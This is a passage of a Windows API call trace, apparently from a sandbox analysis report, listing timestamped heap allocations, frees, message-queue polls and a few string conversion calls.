hHeap=0x970000) returned 1 [0185.052] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bf0 | out: hHeap=0x970000) returned 1 [0185.052] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b48 [0185.053] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c08 [0185.053] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b30 [0185.053] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e98 [0185.053] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b30 | out: hHeap=0x970000) returned 1 [0185.053] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0185.053] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c08 | out: hHeap=0x970000) returned 1 [0185.053] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ae8 [0185.053] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b78 [0185.053] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c08 [0185.053] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e18 [0185.053] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c08 | out: hHeap=0x970000) returned 1 [0185.053] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0185.053] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b78 | out: hHeap=0x970000) returned 1 [0185.053] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c20 [0185.053] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a40 [0185.053] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a58 [0185.053] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54de8 [0185.053] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a58 | out: hHeap=0x970000) returned 1 [0185.053] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0185.053] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a40 | out: hHeap=0x970000) returned 1 [0185.054] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0185.054] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0185.054] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0185.054] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0185.055] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0185.055] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e543a0 | out: hHeap=0x970000) returned 1 [0185.055] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a10 | out: hHeap=0x970000) returned 1 [0185.055] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0185.055] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507b8 | out: hHeap=0x970000) returned 1 [0185.055] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507a0 | out: hHeap=0x970000) returned 1 [0185.055] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50758 | out: hHeap=0x970000) returned 1 [0185.055] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50878 | out: hHeap=0x970000) returned 1 [0185.055] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507d0 | out: hHeap=0x970000) returned 1 [0185.055] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c98 | out: hHeap=0x970000) returned 1 [0185.055] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ad0 | out: hHeap=0x970000) returned 1 [0185.055] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50788 | out: hHeap=0x970000) returned 1 [0185.055] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bc0 | out: hHeap=0x970000) returned 1 [0185.055] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b60 | out: hHeap=0x970000) returned 1 [0185.055] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a88 | out: hHeap=0x970000) returned 1 [0185.056] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c68 | out: hHeap=0x970000) returned 1 [0185.056] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b00 | out: hHeap=0x970000) returned 1 [0185.056] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50aa0 | out: hHeap=0x970000) returned 1 [0185.056] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a70 | out: hHeap=0x970000) returned 1 [0185.056] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ba8 | out: hHeap=0x970000) returned 1 [0185.056] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c80 | out: hHeap=0x970000) returned 1 [0185.056] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b18 | out: hHeap=0x970000) returned 1 [0185.056] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bd8 | out: hHeap=0x970000) returned 1 [0185.056] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509f8 | out: hHeap=0x970000) returned 1 [0185.056] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78a50 | out: hHeap=0x970000) returned 1 [0185.056] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cc8 | out: hHeap=0x970000) returned 1 [0185.056] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50968 | out: hHeap=0x970000) returned 1 [0185.056] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cd8 | out: hHeap=0x970000) returned 1 [0185.056] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50998 | out: hHeap=0x970000) returned 1 [0185.056] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2e558d8 [0185.056] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x978490 | out: hHeap=0x970000) returned 1 [0185.056] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0185.056] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cc8 [0185.056] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cd8 [0185.057] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d48 [0185.057] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b08 [0185.057] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e18 [0185.057] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0185.057] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0185.057] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b08 | out: hHeap=0x970000) returned 1 [0185.057] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cd8 | out: hHeap=0x970000) returned 1 [0185.057] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cc8 | out: hHeap=0x970000) returned 1 [0185.057] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77688 [0185.057] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0185.057] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77688 | out: hHeap=0x970000) returned 1 [0185.057] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0185.057] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cc8 [0185.057] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cd8 [0185.057] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cd8 | out: hHeap=0x970000) returned 1 [0185.057] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cc8 | out: hHeap=0x970000) returned 1 [0185.057] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50770 | out: hHeap=0x970000) returned 1 [0185.057] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0185.057] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50908 | out: hHeap=0x970000) returned 1 [0185.057] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0185.057] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d48 [0185.057] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50878 [0185.058] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50908 [0185.058] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54da8 [0185.058] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50968 [0185.058] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e18 [0185.058] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e698c8 [0185.058] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50998 [0185.058] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50758 [0185.058] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d38 [0185.058] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50770 [0185.058] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0185.058] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x3) returned 0x2e54f08 [0185.058] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e38 [0185.058] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e48 [0185.058] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 4 [0185.058] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e68 [0185.058] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x2e54e68, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="888", lpUsedDefaultChar=0x0) returned 4 [0185.058] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0185.058] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0185.058] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0185.058] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dc8 [0185.058] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50770 | out: hHeap=0x970000) returned 1 [0185.058] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0185.058] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0185.059] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50758 | out: hHeap=0x970000) returned 1 [0185.059] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50998 | out: hHeap=0x970000) returned 1 [0185.059] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50998 [0185.059] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50758 [0185.059] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e78 [0185.059] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ef8 [0185.059] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50788 [0185.059] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50758 | out: hHeap=0x970000) returned 1 [0185.059] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0185.059] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50998 | out: hHeap=0x970000) returned 1 [0185.059] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50758 [0185.059] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50758 | out: hHeap=0x970000) returned 1 [0185.059] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e698c8 | out: hHeap=0x970000) returned 1 [0185.059] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0185.059] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0185.059] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69ac8 [0185.059] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54eb8 [0185.059] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50998 [0185.059] CharLowerBuffW (in: lpsz="byte[3]", cchLength=0x7 | out: lpsz="byte[3]") returned 0x7 [0185.059] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977db8 [0185.059] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50758 [0185.059] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e98 [0185.059] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50770 [0185.060] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f08 [0185.060] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507a0 [0185.060] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54da8 [0185.060] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507b8 [0185.060] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d18 [0185.060] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507b8 | out: hHeap=0x970000) returned 1 [0185.060] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0185.060] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507a0 | out: hHeap=0x970000) returned 1 [0185.060] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0185.060] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50770 | out: hHeap=0x970000) returned 1 [0185.060] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0185.060] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e18 [0185.060] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x3) returned 0x2e54f08 [0185.060] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50998 | out: hHeap=0x970000) returned 1 [0185.060] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0185.060] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50788 | out: hHeap=0x970000) returned 1 [0185.060] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0185.060] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50968 | out: hHeap=0x970000) returned 1 [0185.060] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50908 | out: hHeap=0x970000) returned 1 [0185.060] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50878 | out: hHeap=0x970000) returned 1 [0185.060] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0185.060] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507e8 | out: hHeap=0x970000) returned 1 [0185.060] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0185.061] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50848 | out: hHeap=0x970000) returned 1 [0185.061] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69c08 [0185.061] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977de8 [0185.061] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50998 [0185.061] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d28 [0185.061] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50758 | out: hHeap=0x970000) returned 1 [0185.061] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0185.061] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977db8 | out: hHeap=0x970000) returned 1 [0185.061] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69ac8 | out: hHeap=0x970000) returned 1 [0185.061] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0185.061] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50968 [0185.061] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50758 [0185.061] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54eb8 [0185.061] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69b88 [0185.061] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977c08 [0185.061] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50770 [0185.061] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d98 [0185.061] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0185.061] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507a0 [0185.061] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ef8 [0185.061] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0185.061] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50788 [0185.061] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d68 [0185.062] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507b8 [0185.062] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0185.062] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x3) returned 0x2e54ea8 [0185.062] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54da8 [0185.062] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54db8 [0185.062] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 4 [0185.062] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e28 [0185.062] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x2e54e28, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="888", lpUsedDefaultChar=0x0) returned 4 [0185.062] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0185.062] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0185.062] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0185.062] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e88 [0185.062] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507b8 | out: hHeap=0x970000) returned 1 [0185.062] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ef8 [0185.062] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x3) returned 0x2e54db8 [0185.062] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50770 | out: hHeap=0x970000) returned 1 [0185.062] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0185.062] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977c08 | out: hHeap=0x970000) returned 1 [0185.062] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b88 | out: hHeap=0x970000) returned 1 [0185.062] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50758 | out: hHeap=0x970000) returned 1 [0185.062] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507a0 | out: hHeap=0x970000) returned 1 [0185.062] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0185.063] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0185.063] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50788 | out: hHeap=0x970000) returned 1 [0185.063] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50968 | out: hHeap=0x970000) returned 1 [0185.063] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0185.063] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0185.063] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0185.063] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d98 [0185.063] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50878 [0185.063] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50968 [0185.063] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d18 [0185.063] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e80178 [0185.063] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d68 [0185.063] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0185.063] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e80178 | out: hHeap=0x970000) returned 1 [0185.063] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0185.063] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50908 [0185.063] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78a50 [0185.063] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0185.063] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e48 [0185.063] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54da8 [0185.063] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0185.063] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0185.063] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78a50 | out: hHeap=0x970000) returned 1 [0185.063] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50908 | out: hHeap=0x970000) returned 1 [0185.064] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0185.064] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50758 [0185.064] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d48 [0185.064] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50770 [0185.064] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0185.064] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50908 [0185.064] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54de8 [0185.064] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50788 [0185.064] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0185.064] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507a0 [0185.064] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d68 [0185.064] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50848 [0185.064] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0185.064] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54238 [0185.064] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50878 | out: hHeap=0x970000) returned 1 [0185.064] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507e8 [0185.064] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ec8 [0185.064] HeapFree (in: 